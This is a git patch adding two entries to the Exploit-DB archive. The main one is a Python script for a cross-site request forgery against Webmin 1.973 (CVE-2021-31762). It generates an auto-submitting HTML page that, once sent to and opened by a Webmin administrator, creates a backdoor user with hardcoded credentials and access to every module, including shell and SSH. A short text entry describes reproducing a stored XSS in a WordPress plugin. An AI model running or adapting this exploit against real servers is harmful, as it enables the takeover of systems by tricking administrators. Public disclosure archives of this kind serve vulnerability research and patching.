From 42322e3bcda15476aeeaa403375bc0594d73fc77 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 15 Jul 2021 05:01:54 +0000
Subject: [PATCH] DB: 2021-07-15

2 changes to exploits/shellcodes

Webmin 1.973 - Cross-Site Request Forgery (CSRF)

WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)
---
 exploits/linux/webapps/50126.py | 230 ++++++++++++++++++++++++++++++++
 exploits/php/webapps/50127.txt  |  15 +++
 files_exploits.csv              |   2 +
 3 files changed, 247 insertions(+)
 create mode 100755 exploits/linux/webapps/50126.py
 create mode 100644 exploits/php/webapps/50127.txt
diff --git a/exploits/linux/webapps/50126.py b/exploits/linux/webapps/50126.py
new file mode 100755
index 000000000..30c9c6946
--- /dev/null
+++ b/exploits/linux/webapps/50126.py
@@ -0,0 +1,230 @@
+# Exploit Title: Webmin 1.973 - Cross-Site Request Forgery (CSRF)
+# Date: 24/04/2021
+# Exploit Author: *Mesh3l_911 & Z0ldyck
+# Vendor Homepage: https://www.webmin.com
+# Repo Link: https://github.com/Mesh3l911/CVE-2021-31762
+# Version: Webmin 1.973
+# Tested on: All versions <= 1.973
+# CVE : CVE-2021-31762
+# POC: https://youtu.be/qCvEXwyaF5U
+
+
+import time, subprocess
+
+print('''\033[1;37m
+
+ __  __           _     ____  _          _________  _     _            _    
+|  \/  |         | |   |___ \| |        |___  / _ \| |   | |          | |   
+| \  / | ___  ___| |__   __) | |           / / | | | | __| |_   _  ___| | __
+| |\/| |/ _ \/ __| '_ \ |__ <| |          / /| | | | |/ _` | | | |/ __| |/ /
+| |  | |  __/\__ \ | | |___) | |  _ _    / /_| |_| | | (_| | |_| | (__|   < 
+|_|  |_|\___||___/_| |_|____/|_| (_|_)  /_____\___/|_|\__,_|\__, |\___|_|\_/
+                                                             __/ |          
+                                                            |___/           
+
+    \033[1;m''')
+
+for i in range(101):
+    print(
+        "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m )  & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m  ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
+            i), "\033[1;36m%\033[1;m", end="")
+    time.sleep(0.02)
+print("\n\n")
+
+target = input(
+    "\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
+
+if target.endswith('/'):
+    target = target + 'acl/save_user.cgi'
+else:
+    target = target + '/acl/save_user.cgi'
+
+
+def CSRF_Generator():
+    with open('CSRF_POC.html', 'w') as POC:
+        POC.write \
+            ('''
+
+<html>
+        <head>
+            <meta name="referrer" content="never">
+        </head>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="'''+target+'''" method="POST">
+      <input type="hidden" name="safe" value="" />
+      <input type="hidden" name="name" value="Mesh3l&#95;Z0ldyck" />
+      <input type="hidden" name="pass&#95;def" value="0" />
+      <input type="hidden" name="pass" value="Mesh3l&#95;Z0ldyck123" />
+      <input type="hidden" name="real" value="Mesh3l&#95;Z0ldyck" />
+      <input type="hidden" name="cert&#95;def" value="1" />
+      <input type="hidden" name="lang&#95;def" value="1" />
+      <input type="hidden" name="lang" value="af" />
+      <input type="hidden" name="notabs" value="0" />
+      <input type="hidden" name="theme&#95;def" value="1" />
+      <input type="hidden" name="theme" value="" />
+      <input type="hidden" name="overlay&#95;def" value="1" />
+      <input type="hidden" name="overlay" value="overlay&#45;theme" />
+      <input type="hidden" name="logouttime&#95;def" value="1" />
+      <input type="hidden" name="minsize&#95;def" value="1" />
+      <input type="hidden" name="ipmode" value="0" />
+      <input type="hidden" name="ips" value="" />
+      <input type="hidden" name="days&#95;def" value="1" />
+      <input type="hidden" name="hours&#95;def" value="1" />
+      <input type="hidden" name="hours&#95;hfrom" value="" />
+      <input type="hidden" name="hours&#95;mfrom" value="" />
+      <input type="hidden" name="hours&#95;hto" value="" />
+      <input type="hidden" name="hours&#95;mto" value="" />
+      <input type="hidden" name="mod" value="backup&#45;config" />
+      <input type="hidden" name="mod" value="change&#45;user" />
+      <input type="hidden" name="mod" value="webmincron" />
+      <input type="hidden" name="mod" value="usermin" />
+      <input type="hidden" name="mod" value="webminlog" />
+      <input type="hidden" name="mod" value="webmin" />
+      <input type="hidden" name="mod" value="help" />
+      <input type="hidden" name="mod" value="servers" />
+      <input type="hidden" name="mod" value="acl" />
+      <input type="hidden" name="mod" value="bacula&#45;backup" />
+      <input type="hidden" name="mod" value="init" />
+      <input type="hidden" name="mod" value="passwd" />
+      <input type="hidden" name="mod" value="quota" />
+      <input type="hidden" name="mod" value="mount" />
+      <input type="hidden" name="mod" value="fsdump" />
+      <input type="hidden" name="mod" value="ldap&#45;client" />
+      <input type="hidden" name="mod" value="ldap&#45;useradmin" />
+      <input type="hidden" name="mod" value="logrotate" />
+      <input type="hidden" name="mod" value="mailcap" />
+      <input type="hidden" name="mod" value="mon" />
+      <input type="hidden" name="mod" value="pam" />
+      <input type="hidden" name="mod" value="certmgr" />
+      <input type="hidden" name="mod" value="proc" />
+      <input type="hidden" name="mod" value="at" />
+      <input type="hidden" name="mod" value="cron" />
+      <input type="hidden" name="mod" value="sentry" />
+      <input type="hidden" name="mod" value="man" />
+      <input type="hidden" name="mod" value="syslog" />
+      <input type="hidden" name="mod" value="syslog&#45;ng" />
+      <input type="hidden" name="mod" value="system&#45;status" />
+      <input type="hidden" name="mod" value="useradmin" />
+      <input type="hidden" name="mod" value="apache" />
+      <input type="hidden" name="mod" value="bind8" />
+      <input type="hidden" name="mod" value="pserver" />
+      <input type="hidden" name="mod" value="dhcpd" />
+      <input type="hidden" name="mod" value="dhcp&#45;dns" />
+      <input type="hidden" name="mod" value="dovecot" />
+      <input type="hidden" name="mod" value="exim" />
+      <input type="hidden" name="mod" value="fetchmail" />
+      <input type="hidden" name="mod" value="foobar" />
+      <input type="hidden" name="mod" value="frox" />
+      <input type="hidden" name="mod" value="jabber" />
+      <input type="hidden" name="mod" value="ldap&#45;server" />
+      <input type="hidden" name="mod" value="majordomo" />
+      <input type="hidden" name="mod" value="htpasswd&#45;file" />
+      <input type="hidden" name="mod" value="minecraft" />
+      <input type="hidden" name="mod" value="mysql" />
+      <input type="hidden" name="mod" value="openslp" />
+      <input type="hidden" name="mod" value="postfix" />
+      <input type="hidden" name="mod" value="postgresql" />
+      <input type="hidden" name="mod" value="proftpd" />
+      <input type="hidden" name="mod" value="procmail" />
+      <input type="hidden" name="mod" value="qmailadmin" />
+      <input type="hidden" name="mod" value="mailboxes" />
+      <input type="hidden" name="mod" value="sshd" />
+      <input type="hidden" name="mod" value="samba" />
+      <input type="hidden" name="mod" value="sendmail" />
+      <input type="hidden" name="mod" value="spam" />
+      <input type="hidden" name="mod" value="squid" />
+      <input type="hidden" name="mod" value="sarg" />
+      <input type="hidden" name="mod" value="wuftpd" />
+      <input type="hidden" name="mod" value="webalizer" />
+      <input type="hidden" name="mod" value="link" />
+      <input type="hidden" name="mod" value="adsl&#45;client" />
+      <input type="hidden" name="mod" value="bandwidth" />
+      <input type="hidden" name="mod" value="fail2ban" />
+      <input type="hidden" name="mod" value="firewalld" />
+      <input type="hidden" name="mod" value="ipsec" />
+      <input type="hidden" name="mod" value="krb5" />
+      <input type="hidden" name="mod" value="firewall" />
+      <input type="hidden" name="mod" value="firewall6" />
+      <input type="hidden" name="mod" value="exports" />
+      <input type="hidden" name="mod" value="exports&#45;nfs4" />
+      <input type="hidden" name="mod" value="xinetd" />
+      <input type="hidden" name="mod" value="inetd" />
+      <input type="hidden" name="mod" value="pap" />
+      <input type="hidden" name="mod" value="ppp&#45;client" />
+      <input type="hidden" name="mod" value="pptp&#45;client" />
+      <input type="hidden" name="mod" value="pptp&#45;server" />
+      <input type="hidden" name="mod" value="stunnel" />
+      <input type="hidden" name="mod" value="shorewall" />
+      <input type="hidden" name="mod" value="shorewall6" />
+      <input type="hidden" name="mod" value="itsecur&#45;firewall" />
+      <input type="hidden" name="mod" value="tcpwrappers" />
+      <input type="hidden" name="mod" value="idmapd" />
+      <input type="hidden" name="mod" value="filter" />
+      <input type="hidden" name="mod" value="burner" />
+      <input type="hidden" name="mod" value="grub" />
+      <input type="hidden" name="mod" value="lilo" />
+      <input type="hidden" name="mod" value="raid" />
+      <input type="hidden" name="mod" value="lvm" />
+      <input type="hidden" name="mod" value="fdisk" />
+      <input type="hidden" name="mod" value="lpadmin" />
+      <input type="hidden" name="mod" value="smart&#45;status" />
+      <input type="hidden" name="mod" value="time" />
+      <input type="hidden" name="mod" value="vgetty" />
+      <input type="hidden" name="mod" value="iscsi&#45;client" />
+      <input type="hidden" name="mod" value="iscsi&#45;server" />
+      <input type="hidden" name="mod" value="iscsi&#45;tgtd" />
+      <input type="hidden" name="mod" value="iscsi&#45;target" />
+      <input type="hidden" name="mod" value="cluster&#45;passwd" />
+      <input type="hidden" name="mod" value="cluster&#45;copy" />
+      <input type="hidden" name="mod" value="cluster&#45;cron" />
+      <input type="hidden" name="mod" value="cluster&#45;shell" />
+      <input type="hidden" name="mod" value="cluster&#45;shutdown" />
+      <input type="hidden" name="mod" value="cluster&#45;usermin" />
+      <input type="hidden" name="mod" value="cluster&#45;useradmin" />
+      <input type="hidden" name="mod" value="cluster&#45;webmin" />
+      <input type="hidden" name="mod" value="cfengine" />
+      <input type="hidden" name="mod" value="heartbeat" />
+      <input type="hidden" name="mod" value="shell" />
+      <input type="hidden" name="mod" value="custom" />
+      <input type="hidden" name="mod" value="disk&#45;usage" />
+      <input type="hidden" name="mod" value="export&#45;test" />
+      <input type="hidden" name="mod" value="ftelnet" />
+      <input type="hidden" name="mod" value="filemin" />
+      <input type="hidden" name="mod" value="flashterm" />
+      <input type="hidden" name="mod" value="tunnel" />
+      <input type="hidden" name="mod" value="file" />
+      <input type="hidden" name="mod" value="phpini" />
+      <input type="hidden" name="mod" value="cpan" />
+      <input type="hidden" name="mod" value="htaccess&#45;htpasswd" />
+      <input type="hidden" name="mod" value="telnet" />
+      <input type="hidden" name="mod" value="ssh" />
+      <input type="hidden" name="mod" value="ssh2" />
+      <input type="hidden" name="mod" value="shellinabox" />
+      <input type="hidden" name="mod" value="status" />
+      <input type="hidden" name="mod" value="ajaxterm" />
+      <input type="hidden" name="mod" value="updown" />
+      <input type="hidden" name="mod" value="vnc" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <script>
+      document.forms[0].submit();
+    </script>
+  </body>
+</html>
+
+
+    ''')
+    POC.close()
+
+    print(
+        "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m")
+
+
+
+def main():
+    CSRF_Generator()
+
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/50127.txt b/exploits/php/webapps/50127.txt
new file mode 100644
index 000000000..533f3374f
--- /dev/null
+++ b/exploits/php/webapps/50127.txt
@@ -0,0 +1,15 @@
+# Exploit Title: WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)
+# Date: 14/07/2021
+# Exploit Author: Vikas Srivastava
+# Vendor Homepage:
+# Software Link: https://wordpress.org/plugins/current-book/
+# Version: 1.0.1
+# Category: Web Application
+
+How to Reproduce this Vulnerability:
+
+1. Install WordPress 5.7.2
+2. Install and activate Custom Book
+3. Navigate to Tools >> Current Book and enter the XSS payload into the Book and Author input field.
+4. Click Update Options
+5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 76d5cd67a..b9ebb371d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -26042,6 +26042,7 @@ id,file,description,date,author,type,platform,port
 12866,exploits/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,webapps,php,
 12867,exploits/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,webapps,php,
 12868,exploits/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,webapps,php,
+50126,exploits/linux/webapps/50126.py,"Webmin 1.973 - Cross-Site Request Forgery (CSRF)",2021-07-14,Mesh3l_911,webapps,linux,
 49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",2021-01-18,"Aitor Herrero",webapps,php,
 49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",2021-01-18,"Aitor Herrero",webapps,php,
 49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",2021-01-19,"Talat Mehmood",webapps,php,
@@ -44261,3 +44262,4 @@ id,file,description,date,author,type,platform,port
 50121,exploits/php/webapps/50121.txt,"Invoice System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-07-13,"Subhadip Nag",webapps,php,
 50122,exploits/php/webapps/50122.rb,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)",2021-07-13,"Alexandre ZANNI",webapps,php,
 50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",2021-07-13,"Luca Bernardi",webapps,php,
+50127,exploits/php/webapps/50127.txt,"WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)",2021-07-14,"Vikas Srivastava",webapps,php,
